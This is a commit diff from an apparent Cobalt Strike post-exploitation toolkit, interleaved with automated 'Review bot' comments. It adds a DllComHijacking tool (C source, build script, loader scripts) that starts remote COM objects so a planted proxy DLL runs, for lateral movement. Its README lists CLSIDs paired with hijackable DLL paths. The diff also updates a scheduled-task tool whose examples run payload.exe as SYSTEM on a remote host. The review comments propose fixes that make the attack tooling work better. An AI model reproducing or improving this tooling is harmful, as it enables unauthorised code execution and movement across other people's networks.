RTO 2 years ago
parent
commit
d01a6c3704

+ 10 - 10
KIT/AddTaskScheduler/README.md

@@ -1,7 +1,7 @@
 # AddTaskScheduler
 # AddTaskScheduler
 This tool can be used to create a scheduled task on the current system or a remote host. It supports multiple trigger options. If the tool is running with elevated privileges, it will automatically set the `Run whether user is logged on or not` security option as `NT AUTHORITY\SYSTEM`. 
 This tool can be used to create a scheduled task on the current system or a remote host. It supports multiple trigger options. If the tool is running with elevated privileges, it will automatically set the `Run whether user is logged on or not` security option as `NT AUTHORITY\SYSTEM`. 
 
 
->As a rule of thumb, setting a scheduled task for any user but yourself, requires elevated privileges. Furthermore, the tool returns error codes if the operation fails. The most common error codes are: 80070005 (not enough privileges), 80041318/80041319 (most likely you made a typo in one of the input fields), and 80070002 (scheduled task doesn't exist). 
+>As a rule of thumb, setting a scheduled task for any user but yourself, requires elevated privileges. Furthermore, the tool returns error codes if the operation fails. The most common error codes are: 80070005 (not enough privileges) and 80041318/80041319 (most likely you made a typo in one of the input fields). 
 
 
 ## Basic parameters
 ## Basic parameters
 * `taskName`: The name of the scheduled task.
 * `taskName`: The name of the scheduled task.
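Review bot: the rewritten error-code list in the `+` line drops 80070002 (correct for a create tool) but does not pick up 80041310, which the addtaskscheduler.c change in this same commit documents as a known failure mode ("SYSTEM security option is not set correctly and remains NULL"); add it here, e.g. `80041310 (the SYSTEM "Run whether user is logged on or not" option could not be applied; use the NoSYSTEM build)`. The unchanged first paragraph also says SYSTEM is only set "If the tool is running with elevated privileges", while the code branch `if (IsElevated() || isRemoteHost)` applies it for any remote hostName as well; the README should state that.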
@@ -27,17 +27,17 @@ This tool can be used to create a scheduled task on the current system or a remo
 * `repeatTask`: Set "Repeat task every x minutes/hours" option in format `PT2H` with a duration of `Indefinitely`.
 * `repeatTask`: Set "Repeat task every x minutes/hours" option in format `PT2H` with a duration of `Indefinitely`.
 
 
 ## Usage
 ## Usage
-* `addtaskscheduler <taskName> <(optional) hostName> <programPath> "<(optional) programArguments>" onetime <startTime> <(optional) repeatTask>`
-* `addtaskscheduler <taskName> <(optional) hostName> <programPath> "<(optional) programArguments>" daily <startTime> <(optional) expireTime> <(optional) daysInterval> <(optional) delay>`
-* `addtaskscheduler <taskName> <(optional) hostName> <programPath> "<(optional) programArguments>" logon <(optional) userID>`
-* `addtaskscheduler <taskName> <(optional) hostName> <programPath> "<(optional) programArguments>" startup <(optional) delay>`
-* `addtaskscheduler <taskName> <(optional) hostName> <programPath> "<(optional) programArguments>" lock <(optional) userID> <(optional) delay>`
-* `addtaskscheduler <taskName> <(optional) hostName> <programPath> "<(optional) programArguments>" unlock <(optional) userID> <(optional) delay>`
+* OneTime trigger: `addtaskscheduler <taskName> <(optional) hostName> <programPath> "<(optional) programArguments>" onetime <startTime> <(optional) repeatTask>`
+* Daily trigger: `addtaskscheduler <taskName> <(optional) hostName> <programPath> "<(optional) programArguments>" daily <startTime> <(optional) expireTime> <(optional) daysInterval> <(optional) delay>`
+* Logon trigger: `addtaskscheduler <taskName> <(optional) hostName> <programPath> "<(optional) programArguments>" logon <(optional) userID>`
+* Startup trigger: `addtaskscheduler <taskName> <(optional) hostName> <programPath> "<(optional) programArguments>" startup <(optional) delay>`
+* Lock trigger: `addtaskscheduler <taskName> <(optional) hostName> <programPath> "<(optional) programArguments>" lock <(optional) userID> <(optional) delay>`
+* Unlock trigger: `addtaskscheduler <taskName> <(optional) hostName> <programPath> "<(optional) programArguments>" unlock <(optional) userID> <(optional) delay>`
 
 
 ## Examples
 ## Examples
-* `addtaskscheduler ExampleTask "" C:\Users\Public\Downloads\payload.exe "" onetime 2023-03-24T12:08:00 PT3H`
-* `addtaskscheduler ExampleTask "" C:\Windows\System32\cmd.exe "/c C:\Windows\System32\calc.exe" daily 2023-03-24T12:08:00 2023-03-28T12:14:00 1 PT2H`
-* `addtaskscheduler ExampleTask DB01.example.local C:\Users\Public\Downloads\payload.exe "" startup PT1M`
+* OneTime trigger example: `addtaskscheduler ExampleTask "" C:\Users\Public\Downloads\payload.exe "" onetime 2023-03-24T12:08:00 PT3H`
+* Daily trigger example: `addtaskscheduler ExampleTask "" C:\Windows\System32\cmd.exe "/c C:\Windows\System32\calc.exe" daily 2023-03-24T12:08:00 2023-03-28T12:14:00 1 PT2H`
+* Startup trigger example: `addtaskscheduler ExampleTask DB01.example.local C:\Users\Public\Downloads\payload.exe "" startup PT1M`
 
 
 ## Compile
 ## Compile
 - 1\. Make sure Visual Studio is installed and supports C/C++.
 - 1\. Make sure Visual Studio is installed and supports C/C++.
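Review bot: the labelled usage lines help, but the Examples section still covers only the onetime, daily and startup triggers; the logon, lock and unlock triggers take an optional `<userID>`, and the Usage lines shown here do not say what form it takes (account name, `DOMAIN\user` or SID). Add one example for each of those three triggers with a concrete userID, e.g. `* Logon trigger example: addtaskscheduler ExampleTask "" C:\Users\Public\Downloads\payload.exe "" logon <userID>` with the format spelled out. The remote example (`DB01.example.local ... startup PT1M`) also runs as SYSTEM because of the remote-host branch in the code, which deserves a sentence next to it.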

+ 3 - 0
KIT/AddTaskScheduler/addtaskscheduler.c

@@ -254,6 +254,8 @@ BOOL CreateScheduledTask(char* triggerType, wchar_t* taskName, wchar_t * host, w
 	IPrincipal* pPrincipal = NULL;
 	IPrincipal* pPrincipal = NULL;
 	hr = pTaskDefinition->lpVtbl->get_Principal(pTaskDefinition, &pPrincipal);
 	hr = pTaskDefinition->lpVtbl->get_Principal(pTaskDefinition, &pPrincipal);
 	if (SUCCEEDED(hr)) {
 	if (SUCCEEDED(hr)) {
+		//pPrincipal->lpVtbl->put_LogonType(pPrincipal, TASK_LOGON_INTERACTIVE_TOKEN); //USE THIS LINE INSTEAD OF THE BELOW "If statement" IF ENCOUNTERING ERROR CODE: 80041310 (SYSTEM security option is not set correctly and remains NULL)
+		
 		if (IsElevated() || isRemoteHost) {
 		if (IsElevated() || isRemoteHost) {
 			BeaconPrintf(CALLBACK_OUTPUT, "[*] Running in elevated context and setting \"Run whether user is logged on or not\" security option as SYSTEM!\n"); 
 			BeaconPrintf(CALLBACK_OUTPUT, "[*] Running in elevated context and setting \"Run whether user is logged on or not\" security option as SYSTEM!\n"); 
 			BSTR systemUser = OLEAUT32$SysAllocString(L"SYSTEM");
 			BSTR systemUser = OLEAUT32$SysAllocString(L"SYSTEM");
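Review bot: a commented-out `put_LogonType(pPrincipal, TASK_LOGON_INTERACTIVE_TOKEN)` with a "USE THIS LINE INSTEAD" instruction is a workaround that makes every operator edit the source and recompile (or pick the separately committed `addtaskschedulerNoSYSTEM.o`); the elevated branch should instead check the HRESULTs of the calls that set the SYSTEM principal and, when they fail, fall back to the interactive-token logon type at runtime and print the 0x80041310 code the comment mentions. The condition `if (IsElevated() || isRemoteHost)` also forces the SYSTEM principal for any remote host regardless of elevation, which the README sentence "If the tool is running with elevated privileges" does not cover; and the tab-only `+` line after the comment is trailing whitespace.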
@@ -262,6 +264,7 @@ BOOL CreateScheduledTask(char* triggerType, wchar_t* taskName, wchar_t * host, w
 		}else {
 		}else {
 			pPrincipal->lpVtbl->put_LogonType(pPrincipal, TASK_LOGON_INTERACTIVE_TOKEN);
 			pPrincipal->lpVtbl->put_LogonType(pPrincipal, TASK_LOGON_INTERACTIVE_TOKEN);
 		}
 		}
+		
 		pPrincipal->lpVtbl->Release(pPrincipal);
 		pPrincipal->lpVtbl->Release(pPrincipal);
 	}
 	}
 	
 	
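Review bot: whitespace-only change: the added line before `pPrincipal->lpVtbl->Release(pPrincipal);` contains only tabs and should be dropped from the commit. While here, the `else` branch ignores the HRESULT of `pPrincipal->lpVtbl->put_LogonType(pPrincipal, TASK_LOGON_INTERACTIVE_TOKEN);`; given that the new comment in this file ties 0x80041310 to the logon type not being applied, that return value is the one to check and report.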

BIN
KIT/AddTaskScheduler/addtaskschedulerNoSYSTEM.o


+ 36 - 0
KIT/DllComHijacking/README.md

@@ -0,0 +1,36 @@
+# DllComHijacking
+This tool is capable of instantiating a COM object based on a provided CLSID on a designated host, which initiates the corresponding process. By focusing on processes susceptible to DLL hijacking and utilizing a gained position that allows writing to the directories from which these processes load their modules, (remote) code execution can be achieved. Consequently, this technique can be effectively employed for lateral movement. 
+
+>Note that before running this tool, the proxy DLL must be manually placed in the correct directory. Additionally, it's important to note that most initiated processes are active for only a brief duration. Therefore, ensure that the proxy DLL performs an action appropriate for such short-lived scenarios.
+
+Below are a couple examples (in some casus, there are multiple missing DLL's):
+| CLSID | Process | DLL hijacking option | 
+| --- | --- | --- | --- |
+| {94E03510-31B9-47a0-A44E-E932AC86BB17} | wmlaunch.exe | C:\Program Files\Windows Media Player\MPR.dll |
+| {494C063B-1024-4DD1-89D3-713784E82044} | PrintBrmEngine.exe | C:\Windows\System32\spool\tools\VERSION.dll |
+| {73FDDC80-AEA9-101A-98A7-00AA00374959} | wordpad.exe | C:\Program Files\Windows NT\Accessories\MFC42u.dll |
+| {1E2D67D6-F596-4640-84F6-CE09D630E983} | ShapeCollector.exe | C:\Program Files\Common Files\microsoft shared\ink\DUI70.dll |
+
+
+## Arguments
+* `[<CLSID>]` The CLSID of the COM class that is associated with the vulnerable process.
+* `[<target>]` The FQDN, hostname or IP of the designated host (can be remote- or the local host).
+
+
+## Usage
+* `dllcomhijacking <CLSID> <target>`
+
+
+## Example
+* `dllcomhijacking {73FDDC80-AEA9-101A-98A7-00AA00374959} target.example.local`
+
+
+## Compile
+- 1\. Make sure Visual Studio is installed and supports C/C++.
+- 2\. Open the `x64 Native Tools Command Prompt for VS <2019/2022>` terminal.
+- 3\. Run the `bofcompile.bat` script to compile the object file. 
+- 4\. In Cobalt strike, use the script manager to load the .cna script to import the tool. 
+
+
+## Acknowledgements
+This tool is based on the [dcomhijack](https://github.com/WKL-Sec/dcomhijack) project from WKL-Sec.
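Review bot: the example table will not render as a table: the header row has three columns (`| CLSID | Process | DLL hijacking option |`) but the separator row has four (`| --- | --- | --- | --- |`); remove one `---`. Typos in the same file: "in some casus" should be "in some cases", "DLL's" should be "DLLs", and "a couple examples" should be "a couple of examples". The table also does not say on which Windows or application versions each process and missing DLL was observed, which a reader needs before relying on one of the four CLSIDs; a version column (or a sentence above the table) would fix that.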

+ 69 - 0
KIT/DllComHijacking/beacon.h

@@ -0,0 +1,69 @@
+/*
+ * Beacon Object Files (BOF)
+ * -------------------------
+ * A Beacon Object File is a light-weight post exploitation tool that runs
+ * with Beacon's inline-execute command.
+ *
+ * Additional BOF resources are available here:
+ *   - https://github.com/Cobalt-Strike/bof_template
+ *
+ * Cobalt Strike 4.x
+ * ChangeLog:
+ *    1/25/2022: updated for 4.5
+ */
+
+/* data API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} datap;
+
+DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
+DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
+DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
+DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
+DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
+DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
+
+/* format API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} formatp;
+
+DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
+DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
+DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
+DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
+DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
+
+/* Output Functions */
+#define CALLBACK_OUTPUT      0x0
+#define CALLBACK_OUTPUT_OEM  0x1e
+#define CALLBACK_OUTPUT_UTF8 0x20
+#define CALLBACK_ERROR       0x0d
+
+DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
+DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
+
+
+/* Token Functions */
+DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
+DECLSPEC_IMPORT void   BeaconRevertToken();
+DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
+
+/* Spawn+Inject Functions */
+DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
+DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
+DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
+
+/* Utility Functions */
+DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);

+ 5 - 0
KIT/DllComHijacking/bofcompile.bat

@@ -0,0 +1,5 @@
+@ECHO OFF
+
+cl.exe /nologo /c /Od /MT /W0 /GS- /Tc dllcomhijacking.c
+move /y dllcomhijacking.obj dllcomhijacking.o
+
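Review bot: `/W0` disables all compiler warnings, which is what lets the type errors in dllcomhijacking.c through unnoticed (`LPCOLESTR* clsidString = L"";` and assigning the `char *` returned by `BeaconDataExtract` to `LPCOLESTR*` and `WCHAR*` without a cast). Build with `/W3` (or `/W4`) and fix the warnings instead of silencing them; `/GS-` is the usual BOF setting because there is no CRT to supply the security cookie, and a one-line comment in the script saying so would help the next reader.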

+ 78 - 0
KIT/DllComHijacking/dllcomhijacking.c

@@ -0,0 +1,78 @@
+#include <stdio.h>
+#include <Windows.h>
+#include <objbase.h>
+#include <oleauto.h>
+#include <wbemidl.h>
+#include "dllcomhijacking.h"
+#include "beacon.h"
+
+#pragma comment(lib, "ole32.lib")
+#pragma comment(lib, "oleaut32.lib")
+
+
+void InstantiateCOMObject(LPCOLESTR clsidString, WCHAR remoteHost[]) {
+    IID iid;
+    HRESULT hr = OLE32$CLSIDFromString(clsidString, &iid);
+	if (FAILED(hr)) {
+		if (hr == 0x800401f3) {
+			BeaconPrintf(CALLBACK_ERROR, "The provided CLSID format \"%S\" is not correct (error code: 0x800401f3).\n", clsidString);
+		} else {
+			BeaconPrintf(CALLBACK_ERROR, "CLSIDFromString failed with error code: 0x%08lx\n", hr);
+		}
+		return;
+	}
+
+    hr = OLE32$CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
+    if (FAILED(hr)) {
+        BeaconPrintf(CALLBACK_ERROR, "CoInitialize failed with error code: 0x%08lx\n", hr);
+        return;
+    }
+
+    COAUTHINFO authInfo = {0};
+    authInfo.dwAuthnSvc = RPC_C_AUTHN_WINNT;
+    authInfo.dwAuthzSvc = RPC_C_AUTHZ_NONE;
+    authInfo.pwszServerPrincName = NULL;
+    authInfo.dwAuthnLevel = RPC_C_AUTHN_LEVEL_DEFAULT;
+    authInfo.dwImpersonationLevel = RPC_C_IMP_LEVEL_IMPERSONATE;
+    authInfo.pAuthIdentityData = NULL;
+    authInfo.dwCapabilities = EOAC_NONE;
+
+    COSERVERINFO serverInfo = {0};
+    serverInfo.pwszName = remoteHost;
+    serverInfo.pAuthInfo = &authInfo;
+
+	IID IIDIUnknown = {0x00000000, 0x0000, 0x0000, {0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46}};
+    MULTI_QI mqi = {0};
+    mqi.pIID = &IIDIUnknown; 
+
+    hr = OLE32$CoCreateInstanceEx(&iid, NULL, CLSCTX_REMOTE_SERVER, &serverInfo, 1, &mqi);
+    if (FAILED(hr)) {
+		if (hr == 0x80040154) {
+			BeaconPrintf(CALLBACK_ERROR, "Instantiating the COM object failed because it is not registered on the target system (error code: 0x80040154).\n", clsidString);
+		} else {
+			BeaconPrintf(CALLBACK_ERROR, "CoCreateInstanceEx failed with error code: 0x%08lx\n", hr);
+		} 
+    } else {
+        BeaconPrintf(CALLBACK_OUTPUT, "==========================================\n[+] COM object instantiated successfully!\n");
+    }
+
+	if (mqi.pItf) mqi.pItf->lpVtbl->Release(mqi.pItf);
+    OLE32$CoUninitialize();
+}
+
+
+int go(char *args, int len) {
+	datap parser;
+    LPCOLESTR* clsidString = L"";
+    WCHAR* host = L""; 
+	
+	BeaconDataParse(&parser, args, len);
+	clsidString = BeaconDataExtract(&parser, NULL);
+	host = BeaconDataExtract(&parser, NULL);
+
+    InstantiateCOMObject(clsidString, host);
+    return 0;
+}
+
+
+
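Review bot: `LPCOLESTR* clsidString = L"";` in `go` declares a pointer-to-pointer and initialises it with a string literal, and both `clsidString` and `host` are then assigned the `char *` that `BeaconDataExtract` returns; since the CNA packs them with `ZZ` (wide strings) these should read `LPCOLESTR clsidString = (LPCOLESTR)BeaconDataExtract(&parser, NULL);` and `WCHAR* host = (WCHAR*)BeaconDataExtract(&parser, NULL);`, with a NULL/empty check before they are used. In `InstantiateCOMObject`: the 0x80040154 message passes `clsidString` as an argument but its format string has no `%S` for it; `CoInitializeEx(NULL, COINIT_APARTMENTTHREADED)` returns RPC_E_CHANGED_MODE (0x80010106) when the beacon thread already initialised COM as MTA, and the function then gives up although it could proceed in the existing apartment (skipping the final `CoUninitialize` in that case); `<wbemidl.h>`, `<stdio.h>` and the two `#pragma comment(lib, ...)` lines do nothing in a BOF and can go. The `==========` banner in the success message is out of place next to the plain error lines.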

+ 40 - 0
KIT/DllComHijacking/dllcomhijacking.cna

@@ -0,0 +1,40 @@
+# author REDMED-X
+
+beacon_command_register(
+	"dllcomhijacking", "Leverage DLL Hijacking by instantiating a COM object on a target host",
+	"INFO:\nInstantiate a COM object on a target host that will start the associated process which is vulnerable to DLL Hijacking. This allows for (remote) code execution and is therefore a good lateral movement technique.\nReminder: place the proxy DLL in the correct location before running this tool.\n\n" .
+	"ARGUMENTS:\n[<CLSID>]: The CLSID of the COM class that is associated with the vulnerable process.\n[<target>]: The FQDN, hostname or IP of the target host (can be remote- or the local host).\n\n" .
+	"USAGE:\ndllcomhijacking <CLSID> <target>\n\n" .
+	"EXAMPLES:\ndllcomhijacking {73FDDC80-AEA9-101A-98A7-00AA00374959} target.example.local\n\n");
+	
+alias dllcomhijacking {
+    $bid = $1;
+    $clsid = $2;
+    $target = $3;
+
+    if ($clsid eq "") {
+        berror($bid, "Please specify one TEXT\n");
+        return;
+    }
+
+    if ($target eq "") {
+		berror($bid, "Please specify the TEXT.\n");
+		return;
+    }
+	
+    # Read in the right BOF file
+    $handle = openf(script_resource("dllcomhijacking.o"));
+    $data   = readb($handle, -1);
+    closef($handle);
+
+    # Pack our arguments
+    $arg_data  = bof_pack($bid, "ZZ", $clsid, $target);
+
+    blog($bid, "Tasked to instantiate a (remote) COM object..");
+    beacon_inline_execute($bid, $data, "go", $arg_data);
+}
+
+
+
+
+
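Review bot: both argument checks print placeholder text left over from a template ("Please specify one TEXT", "Please specify the TEXT."); replace them with messages that name the argument, e.g. `berror($bid, "Please specify the CLSID of the COM class (in braces).");` and `berror($bid, "Please specify the target host (FQDN, hostname or IP).");`. The four empty `+` lines at the end of the file are trailing whitespace.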

+ 7 - 0
KIT/DllComHijacking/dllcomhijacking.h

@@ -0,0 +1,7 @@
+#include <windows.h>  
+
+//InstantiateCOMObject
+DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID pvReserved, DWORD dwCoInit);
+DECLSPEC_IMPORT void WINAPI OLE32$CoUninitialize(void);
+DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstanceEx(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, COSERVERINFO *pServerInfo, DWORD dwCount, MULTI_QI *pResults);
+DECLSPEC_IMPORT HRESULT WINAPI OLE32$CLSIDFromString(LPCOLESTR lpsz, LPCLSID pclsid);

BIN
KIT/DllComHijacking/dllcomhijacking.o


+ 38 - 0
OperatorsKit.cna

@@ -1090,6 +1090,44 @@ alias systeminfo {
 
 
 }
 }
 
 
+beacon_command_register(
+	"dllcomhijacking", "Leverage DLL Hijacking by instantiating a COM object on a target host",
+	"INFO:\nInstantiate a COM object on a target host that will start the associated process which is vulnerable to DLL Hijacking. This allows for (remote) code execution and is therefore a good lateral movement technique.\nReminder: place the proxy DLL in the correct location before running this tool.\n\n" .
+	"ARGUMENTS:\n[<CLSID>]: The CLSID of the COM class that is associated with the vulnerable process.\n[<target>]: The FQDN, hostname or IP of the target host (can be remote- or the local host).\n\n" .
+	"USAGE:\ndllcomhijacking <CLSID> <target>\n\n" .
+	"EXAMPLES:\ndllcomhijacking {73FDDC80-AEA9-101A-98A7-00AA00374959} target.example.local\n\n");
+	
+alias dllcomhijacking {
+    $bid = $1;
+    $clsid = $2;
+    $target = $3;
+
+    if ($clsid eq "") {
+        berror($bid, "Please specify one TEXT\n");
+        return;
+    }
+
+    if ($target eq "") {
+		berror($bid, "Please specify the TEXT.\n");
+		return;
+    }
+	
+    # Read in the right BOF file
+    $handle = openf(script_resource("KIT/DllComHijacking/dllcomhijacking.o"));
+    $data   = readb($handle, -1);
+    closef($handle);
+
+    # Pack our arguments
+    $arg_data  = bof_pack($bid, "ZZ", $clsid, $target);
+
+    blog($bid, "Tasked to instantiate a (remote) COM object..");
+    beacon_inline_execute($bid, $data, "go", $arg_data);
+}
+
+
+
+
+
 
 
 
 
 
 
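Review bot: this block is a verbatim copy of `KIT/DllComHijacking/dllcomhijacking.cna` (only the `script_resource` path differs), so the template placeholders "Please specify one TEXT" and "Please specify the TEXT." now exist in two places and will drift; fix the messages in both, or have the aggregate script load the per-tool file so there is one copy. The four empty `+` lines after the alias add nothing.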

+ 1 - 0
README.md

@@ -17,6 +17,7 @@ The following tools are currently in the OperatorsKit:
 |**[DelFirewallRule](KIT/DelFirewallRule)**|Delete a firewall rule.|
 |**[DelFirewallRule](KIT/DelFirewallRule)**|Delete a firewall rule.|
 |**[DelLocalCert](KIT/DelLocalCert)**|Delete a local computer certificate from a specific store.|
 |**[DelLocalCert](KIT/DelLocalCert)**|Delete a local computer certificate from a specific store.|
 |**[DelTaskScheduler](KIT/DelTaskScheduler)**|Delete a scheduled task on the current- or a remote host.|
 |**[DelTaskScheduler](KIT/DelTaskScheduler)**|Delete a scheduled task on the current- or a remote host.|
+|**[DllComHijacking](KIT/DllComHijacking)**|Leverage DLL Hijacking by instantiating a COM object on a target host |
 |**[DllEnvHijacking](KIT/DllEnvHijacking)**|BOF implementation of DLL environment hijacking published by [Wietze](https://www.wietzebeukema.nl/blog/save-the-environment-variables).|
 |**[DllEnvHijacking](KIT/DllEnvHijacking)**|BOF implementation of DLL environment hijacking published by [Wietze](https://www.wietzebeukema.nl/blog/save-the-environment-variables).|
 |**[EnumDotnet](KIT/EnumDotnet)**|Enumerate processes that most likely have .NET loaded.|
 |**[EnumDotnet](KIT/EnumDotnet)**|Enumerate processes that most likely have .NET loaded.|
 |**[EnumExclusions](KIT/EnumExclusions)**|Check the AV for excluded files, folders, extentions and processes.|
 |**[EnumExclusions](KIT/EnumExclusions)**|Check the AV for excluded files, folders, extentions and processes.|
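Review bot: the new table row has a stray space before the closing `|` and no trailing period, while every neighbouring description ends with one (`|Delete a scheduled task on the current- or a remote host.|`); make it `|**[DllComHijacking](KIT/DllComHijacking)**|Leverage DLL hijacking by instantiating a COM object on a target host.|`.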